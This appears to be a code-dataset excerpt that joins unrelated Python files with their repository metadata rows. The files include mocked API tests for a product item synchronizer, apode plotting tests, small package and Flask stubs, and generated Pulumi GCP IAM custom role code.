skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {2: ['Cannot update item: item with MPN `MPN-R-001` the item does not exist.']}
def test_update_item_draft(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'update'
item = mocked_items_response[0]
item['status'] = 'draft'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[item],
)
mocked_responses.add(
method='PUT',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
json=mocked_items_response[0],
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 1
assert errors == {}
def test_update_item_draft_ppu(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'update'
get_sync_items_env['Items']['F2'].value = 'ppu'
item = mocked_items_response[0]
item['status'] = 'draft'
item['type'] = 'ppu'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[item],
)
mocked_responses.add(
method='PUT',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
json=mocked_items_response[0],
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 1
assert errors == {}
def test_update_item_draft_connect_exception(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'update'
item = mocked_items_response[0]
item['status'] = 'draft'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[item],
)
mocked_responses.add(
method='PUT',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
status=500,
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {2: ['500 - Internal Server Error: unexpected error.']}
def test_delete_item_not_exists(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'delete'
get_sync_items_env['Items']['k2'].value = 'draft'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[],
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert deleted == 0
assert errors == {
2: ['Cannot update item: item with MPN `MPN-R-001` the item does not exist.'],
}
def test_delete_item_connect_error(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'delete'
get_sync_items_env['Items']['k2'].value = 'draft'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[mocked_items_response[0]],
)
mocked_responses.add(
method='DELETE',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
status=500,
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert deleted == 0
assert errors == {2: ['500 - Internal Server Error: unexpected error.']}
def test_create_item_custom_uom(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env['Items']['H2'].value = 'unitary tests'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[],
)
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/products/PRD-276-377-545/items',
json=mocked_items_response[0],
)
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/settings/units',
json={
'id': '123',
},
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 1
assert updated == 0
assert errors == {}
| 28.300501 | 100 | 0.62093 | 4,248 | 33,904 | 4.747175 | 0.038136 | 0.072746 | 0.0964 | 0.1205 | 0.951403 | 0.936279 | 0.933254 | 0.927998 | 0.910493 | 0.905683 | 0 | 0.035907 | 0.234427 | 33,904 | 1,197 | 101 | 28.324144 | 0.741023 | 0 | 0 | 0.819028 | 0 | 0.025853 | 0.24823 | 0.061556 | 0 | 0 | 0 | 0 | 0.140641 | 1 | 0.03516 | false | 0 | 0.003102 | 0 | 0.038263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7452c3405444a5b6e87f62f3e902148765833803 | 243 | py | Python | deepnodal/python/structures/__init__.py | Bhumbra/DeepNodal | 33afb2efa5e78ae6558ce60a36bb87c186c1f448 | [
"BSD-3-Clause"
] | 1 | 2019-01-06T09:49:42.000Z | 2019-01-06T09:49:42.000Z | deepnodal/python/structures/__init__.py | Bhumbra/DeepNodal | 33afb2efa5e78ae6558ce60a36bb87c186c1f448 | [
"BSD-3-Clause"
] | 3 | 2020-10-14T14:43:33.000Z | 2022-02-09T23:46:40.000Z | deepnodal/python/structures/__init__.py | Bhumbra/DeepNodal | 33afb2efa5e78ae6558ce60a36bb87c186c1f448 | [
"BSD-3-Clause"
] | null | null | null | from deepnodal.python.structures.link import *
from deepnodal.python.structures.chain import *
from deepnodal.python.structures.stream import *
from deepnodal.python.structures.level import *
from deepnodal.python.structures.network import *
| 34.714286 | 49 | 0.831276 | 30 | 243 | 6.733333 | 0.333333 | 0.321782 | 0.470297 | 0.717822 | 0.693069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08642 | 243 | 6 | 50 | 40.5 | 0.90991 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
746ee4f5eb772e4ac02ce961f4bb11a941989a4f | 124 | py | Python | src/tabnet_lightning/regressor.py | clemens33/thesis | c94e066c2fe22881a7465eb9c3859bd02138748e | [
"MIT"
] | null | null | null | src/tabnet_lightning/regressor.py | clemens33/thesis | c94e066c2fe22881a7465eb9c3859bd02138748e | [
"MIT"
] | null | null | null | src/tabnet_lightning/regressor.py | clemens33/thesis | c94e066c2fe22881a7465eb9c3859bd02138748e | [
"MIT"
] | null | null | null | import pytorch_lightning as pl
from tabnet import TabNet
class TabNetRegressor(pl.LightningModule):
# TODO
pass
| 12.4 | 42 | 0.758065 | 15 | 124 | 6.2 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.201613 | 124 | 9 | 43 | 13.777778 | 0.939394 | 0.032258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
74a83dd59ae17afb9939d904d359d6a8d74f6afb | 180 | py | Python | web/controllers/h5learning/rotationUI.py | ZZh2333/myBlog | 88b7c903fbaa98b5e02ce25ebaeb70268dc6f825 | [
"MIT"
] | null | null | null | web/controllers/h5learning/rotationUI.py | ZZh2333/myBlog | 88b7c903fbaa98b5e02ce25ebaeb70268dc6f825 | [
"MIT"
] | null | null | null | web/controllers/h5learning/rotationUI.py | ZZh2333/myBlog | 88b7c903fbaa98b5e02ce25ebaeb70268dc6f825 | [
"MIT"
] | null | null | null | from . import route_h5learning
from flask import render_template
@route_h5learning.route('/rotationUI')
def rotationUI():
return render_template('/h5learning/rotationUI.html') | 30 | 57 | 0.805556 | 21 | 180 | 6.714286 | 0.52381 | 0.212766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018405 | 0.094444 | 180 | 6 | 57 | 30 | 0.846626 | 0 | 0 | 0 | 0 | 0 | 0.209945 | 0.149171 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
77ab75889326a9546706e8f99cfd26e7e7ad8c64 | 82 | py | Python | blogapp/crons.py | yan-jin/myblog | 05a0e89bbda56ce86d8e1701ed85e2f8aff7e90e | [
"MIT"
] | 1 | 2018-07-26T08:47:50.000Z | 2018-07-26T08:47:50.000Z | blogapp/crons.py | yan-jin/myblog | 05a0e89bbda56ce86d8e1701ed85e2f8aff7e90e | [
"MIT"
] | null | null | null | blogapp/crons.py | yan-jin/myblog | 05a0e89bbda56ce86d8e1701ed85e2f8aff7e90e | [
"MIT"
] | null | null | null | import blogapp.utils as utils
def get_new_data():
utils.get_new_hole_data()
| 13.666667 | 29 | 0.756098 | 14 | 82 | 4.071429 | 0.642857 | 0.210526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158537 | 82 | 5 | 30 | 16.4 | 0.826087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
77f65e13496acfa1cfdb9914c7a737560c17c4ae | 9,648 | py | Python | tests/test_plots.py | ngrion/apode | 59cab7cc85a7335f3ca0f8b9841481a90fd58aea | [
"MIT"
] | 2 | 2020-10-09T13:04:45.000Z | 2020-11-16T13:42:28.000Z | tests/test_plots.py | ngrion/apode | 59cab7cc85a7335f3ca0f8b9841481a90fd58aea | [
"MIT"
] | 45 | 2020-10-09T13:06:33.000Z | 2020-12-09T04:35:07.000Z | tests/test_plots.py | ngrion/apode | 59cab7cc85a7335f3ca0f8b9841481a90fd58aea | [
"MIT"
] | 1 | 2020-11-24T11:46:58.000Z | 2020-11-24T11:46:58.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the
# Apode Project (https://github.com/mchalela/apode).
# Copyright (c) 2020, Néstor Grión and Sofía Sappia
# License: MIT
# Full Text: https://github.com/ngrion/apode/blob/master/LICENSE.txt
from unittest import mock
from apode import datasets
from apode import plots
from matplotlib.testing.decorators import check_figures_equal
import numpy as np
import pytest
# =============================================================================
# TESTS COMMON
# =============================================================================
@check_figures_equal()
def test_default_call(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300, mu=1, nbin=None)
test_ax = fig_test.subplots()
ad.plot.lorenz(ax=test_ax, alpha="r")
exp_ax = fig_ref.subplots()
ad.plot(method="lorenz", ax=exp_ax, alpha="r")
def test_invalid():
ad = datasets.make_uniform(seed=42, size=300, mu=1, nbin=None)
with pytest.raises(AttributeError):
ad.plot("foo")
# =============================================================================
# TESTS LORENZ
# =============================================================================
@check_figures_equal()
def test_plot_relative_lorenz(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
test_ax = fig_test.subplots()
ad.plot.lorenz(ax=test_ax, alpha="r")
exp_ax = fig_ref.subplots()
df = ad.plot._lorenz_data(alpha="r")
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line)
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Cumulative % of variable")
exp_ax.set_title("Lorenz Curve")
@check_figures_equal()
def test_plot_generalized_lorenz(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
test_ax = fig_test.subplots()
ad.plot.lorenz(ax=test_ax, alpha="g")
exp_ax = fig_ref.subplots()
df = ad.plot._lorenz_data(alpha="g")
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line)
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Scaled Cumulative % of variable")
exp_ax.set_title("Generalized Lorenz Curve")
@check_figures_equal()
def test_plot_absolute_lorenz(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
test_ax = fig_test.subplots()
ad.plot.lorenz(ax=test_ax, alpha="a")
exp_ax = fig_ref.subplots()
df = ad.plot._lorenz_data(alpha="a")
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line)
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Cumulative deviation")
exp_ax.set_title("Absolut Lorenz Curve")
def test_lorenz_invalid_alpha():
ad = datasets.make_uniform(seed=42, size=300)
with pytest.raises(ValueError):
ad.plot.lorenz("j")
with pytest.raises(ValueError):
ad.plot.lorenz("j")
with pytest.raises(ValueError):
ad.plot.lorenz(2)
with pytest.raises(ValueError):
ad.plot.lorenz(0)
@check_figures_equal()
def test_plot_lorenz_axes_None(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
# expected
exp_ax = fig_ref.subplots()
fig_ref.set_size_inches(w=plots.DEFAULT_WIDTH, h=plots.DEFAULT_HEIGHT)
df = ad.plot._lorenz_data(alpha="g")
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line)
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Scaled Cumulative % of variable")
exp_ax.set_title("Generalized Lorenz Curve")
# test
test_ax = fig_test.subplots()
with mock.patch("matplotlib.pyplot.gcf", return_value=fig_test):
with mock.patch("matplotlib.pyplot.gca", return_value=test_ax):
ad.plot.lorenz(alpha="g")
# =============================================================================
# TESTS TIP
# =============================================================================
@check_figures_equal()
def test_plot_tip(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
pline = 3
# expected
exp_ax = fig_ref.subplots()
df = ad.plot._tip_data(pline=pline)
exp_ax.plot(df.population, df.variable)
exp_ax.set_title("TIP Curve")
exp_ax.set_ylabel("Cumulated poverty gaps")
exp_ax.set_xlabel("Cumulative % of population")
# exp_ax.legend()
# test
test_ax = fig_test.subplots()
ad.plot.tip(ax=test_ax, pline=pline)
def test_tip_invalid_alpha():
ad = datasets.make_uniform(seed=42, size=300)
with pytest.raises(ValueError):
ad.plot.tip(pline=-2)
with pytest.raises(ValueError):
ad.plot.tip(pline=-0.001)
@check_figures_equal()
def test_plot_tip_axes_None(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
pline = 3
# expected
exp_ax = fig_ref.subplots()
fig_ref.set_size_inches(w=plots.DEFAULT_WIDTH, h=plots.DEFAULT_HEIGHT)
df = ad.plot._tip_data(pline=pline)
exp_ax.plot(df.population, df.variable)
exp_ax.set_title("TIP Curve")
exp_ax.set_ylabel("Cumulated poverty gaps")
exp_ax.set_xlabel("Cumulative % of population")
# exp_ax.legend()
# test
test_ax = fig_test.subplots()
with mock.patch("matplotlib.pyplot.gcf", return_value=fig_test):
with mock.patch("matplotlib.pyplot.gca", return_value=test_ax):
ad.plot.tip(pline=pline)
# =============================================================================
# TESTS PEN
# =============================================================================
@check_figures_equal()
def test_plot_pen(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
pline = 3
# expected
exp_ax = fig_test.subplots()
df, me = ad.plot._pen_data(pline=pline)
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line, label="Mean")
qpl = np.ones(len(df.variable)) * pline / me
exp_ax.plot(df.population, qpl, label="Poverty line")
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Medianized variable")
exp_ax.set_title("Pen's Parade")
exp_ax.legend()
# test
test_ax = fig_ref.subplots()
ad.plot.pen(ax=test_ax, pline=pline)
@check_figures_equal()
def test_plot_pen_pline_None(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
# expected
exp_ax = fig_ref.subplots()
df, me = ad.plot._pen_data(pline=None)
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line, label="Mean")
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Medianized variable")
exp_ax.set_title("Pen's Parade")
exp_ax.legend()
# test
test_ax = fig_test.subplots()
ad.plot.pen(ax=test_ax, pline=None)
@check_figures_equal()
def test_plot_pen_axes_None(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
pline = 3
# expected
exp_ax = fig_ref.subplots()
fig_ref.set_size_inches(w=plots.DEFAULT_WIDTH, h=plots.DEFAULT_HEIGHT)
df, me = ad.plot._pen_data(pline=pline)
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line, label="Mean")
qpl = np.ones(len(df.variable)) * pline / me
exp_ax.plot(df.population, qpl, label="Poverty line")
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Medianized variable")
exp_ax.set_title("Pen's Parade")
exp_ax.legend()
# test
test_ax = fig_test.subplots()
with mock.patch("matplotlib.pyplot.gcf", return_value=fig_test):
with mock.patch("matplotlib.pyplot.gca", return_value=test_ax):
ad.plot.pen(pline=pline)
@check_figures_equal()
def test_plot_pen_axes_None_pline_None(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
# expected
exp_ax = fig_ref.subplots()
fig_ref.set_size_inches(w=plots.DEFAULT_WIDTH, h=plots.DEFAULT_HEIGHT)
df, me = ad.plot._pen_data(pline=None)
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line, label="Mean")
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Medianized variable")
exp_ax.set_title("Pen's Parade")
exp_ax.legend()
# test
test_ax = fig_test.subplots()
with mock.patch("matplotlib.pyplot.gcf", return_value=fig_test):
with mock.patch("matplotlib.pyplot.gca", return_value=test_ax):
ad.plot.pen(pline=None)
# =============================================================================
# TESTS HIST
# =============================================================================
@check_figures_equal()
def test_plot_hist(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
test_ax = fig_test.subplots()
ad.plot.hist(ax=test_ax)
exp_ax = fig_ref.subplots()
ad.data.plot.hist(ax=exp_ax)
@check_figures_equal()
def test_plot_hist_ax_None(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
# expected
exp_ax = fig_ref.subplots()
with mock.patch("matplotlib.pyplot.gcf", return_value=fig_ref):
with mock.patch("matplotlib.pyplot.gca", return_value=exp_ax):
ad.plot.hist(ax=None)
# test
test_ax = fig_test.subplots()
with mock.patch("matplotlib.pyplot.gcf", return_value=fig_test):
with mock.patch("matplotlib.pyplot.gca", return_value=test_ax):
ad.data.plot.hist(ax=None)
@pytest.mark.xfail
def test_hist_isequal():
ad = datasets.make_uniform(seed=42, size=300)
assert ad.plot.hist is ad.plot.hist
| 31.736842 | 79 | 0.641376 | 1,366 | 9,648 | 4.284773 | 0.103953 | 0.061507 | 0.041005 | 0.037588 | 0.876986 | 0.865026 | 0.850333 | 0.812746 | 0.77157 | 0.751751 | 0 | 0.012671 | 0.157442 | 9,648 | 303 | 80 | 31.841584 | 0.707344 | 0.127799 | 0 | 0.720812 | 0 | 0 | 0.112836 | 0.03009 | 0 | 0 | 0 | 0 | 0.005076 | 1 | 0.086294 | false | 0 | 0.030457 | 0 | 0.116751 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
77f7b4a0e8e9be5694b4ab39e3072816e01bace3 | 23,690 | py | Python | sdk/python/pulumi_gcp/projects/iam_custom_role.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/projects/iam_custom_role.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/projects/iam_custom_role.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['IAMCustomRoleArgs', 'IAMCustomRole']
@pulumi.input_type
class IAMCustomRoleArgs:
def __init__(__self__, *,
permissions: pulumi.Input[Sequence[pulumi.Input[str]]],
role_id: pulumi.Input[str],
title: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
stage: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a IAMCustomRole resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] permissions: The names of the permissions this role grants when bound in an IAM policy. At least one permission must be specified.
:param pulumi.Input[str] role_id: The camel case role id to use for this role. Cannot contain `-` characters.
:param pulumi.Input[str] title: A human-readable title for the role.
:param pulumi.Input[str] description: A human-readable description for the role.
:param pulumi.Input[str] project: The project that the service account will be created in.
Defaults to the provider project configuration.
:param pulumi.Input[str] stage: The current launch stage of the role.
Defaults to `GA`.
List of possible stages is [here](https://cloud.google.com/iam/reference/rest/v1/organizations.roles#Role.RoleLaunchStage).
"""
pulumi.set(__self__, "permissions", permissions)
pulumi.set(__self__, "role_id", role_id)
pulumi.set(__self__, "title", title)
if description is not None:
pulumi.set(__self__, "description", description)
if project is not None:
pulumi.set(__self__, "project", project)
if stage is not None:
pulumi.set(__self__, "stage", stage)
@property
@pulumi.getter
def permissions(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
The names of the permissions this role grants when bound in an IAM policy. At least one permission must be specified.
"""
return pulumi.get(self, "permissions")
@permissions.setter
def permissions(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "permissions", value)
@property
@pulumi.getter(name="roleId")
def role_id(self) -> pulumi.Input[str]:
"""
The camel case role id to use for this role. Cannot contain `-` characters.
"""
return pulumi.get(self, "role_id")
@role_id.setter
def role_id(self, value: pulumi.Input[str]):
pulumi.set(self, "role_id", value)
@property
@pulumi.getter
def title(self) -> pulumi.Input[str]:
"""
A human-readable title for the role.
"""
return pulumi.get(self, "title")
@title.setter
def title(self, value: pulumi.Input[str]):
pulumi.set(self, "title", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A human-readable description for the role.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The project that the service account will be created in.
Defaults to the provider project configuration.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter
def stage(self) -> Optional[pulumi.Input[str]]:
"""
The current launch stage of the role.
Defaults to `GA`.
List of possible stages is [here](https://cloud.google.com/iam/reference/rest/v1/organizations.roles#Role.RoleLaunchStage).
"""
return pulumi.get(self, "stage")
@stage.setter
def stage(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "stage", value)
@pulumi.input_type
class _IAMCustomRoleState:
def __init__(__self__, *,
deleted: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
permissions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
project: Optional[pulumi.Input[str]] = None,
role_id: Optional[pulumi.Input[str]] = None,
stage: Optional[pulumi.Input[str]] = None,
title: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering IAMCustomRole resources.
:param pulumi.Input[bool] deleted: (Optional) The current deleted state of the role.
:param pulumi.Input[str] description: A human-readable description for the role.
:param pulumi.Input[str] name: The name of the role in the format `projects/{{project}}/roles/{{role_id}}`. Like `id`, this field can be used as a reference in other resources such as IAM role bindings.
:param pulumi.Input[Sequence[pulumi.Input[str]]] permissions: The names of the permissions this role grants when bound in an IAM policy. At least one permission must be specified.
:param pulumi.Input[str] project: The project that the service account will be created in.
Defaults to the provider project configuration.
:param pulumi.Input[str] role_id: The camel case role id to use for this role. Cannot contain `-` characters.
:param pulumi.Input[str] stage: The current launch stage of the role.
Defaults to `GA`.
List of possible stages is [here](https://cloud.google.com/iam/reference/rest/v1/organizations.roles#Role.RoleLaunchStage).
:param pulumi.Input[str] title: A human-readable title for the role.
"""
if deleted is not None:
pulumi.set(__self__, "deleted", deleted)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if permissions is not None:
pulumi.set(__self__, "permissions", permissions)
if project is not None:
pulumi.set(__self__, "project", project)
if role_id is not None:
pulumi.set(__self__, "role_id", role_id)
if stage is not None:
pulumi.set(__self__, "stage", stage)
if title is not None:
pulumi.set(__self__, "title", title)
@property
@pulumi.getter
def deleted(self) -> Optional[pulumi.Input[bool]]:
"""
(Optional) The current deleted state of the role.
"""
return pulumi.get(self, "deleted")
@deleted.setter
def deleted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "deleted", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A human-readable description for the role.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the role in the format `projects/{{project}}/roles/{{role_id}}`. Like `id`, this field can be used as a reference in other resources such as IAM role bindings.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def permissions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The names of the permissions this role grants when bound in an IAM policy. At least one permission must be specified.
"""
return pulumi.get(self, "permissions")
@permissions.setter
def permissions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "permissions", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The project that the service account will be created in.
Defaults to the provider project configuration.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="roleId")
def role_id(self) -> Optional[pulumi.Input[str]]:
"""
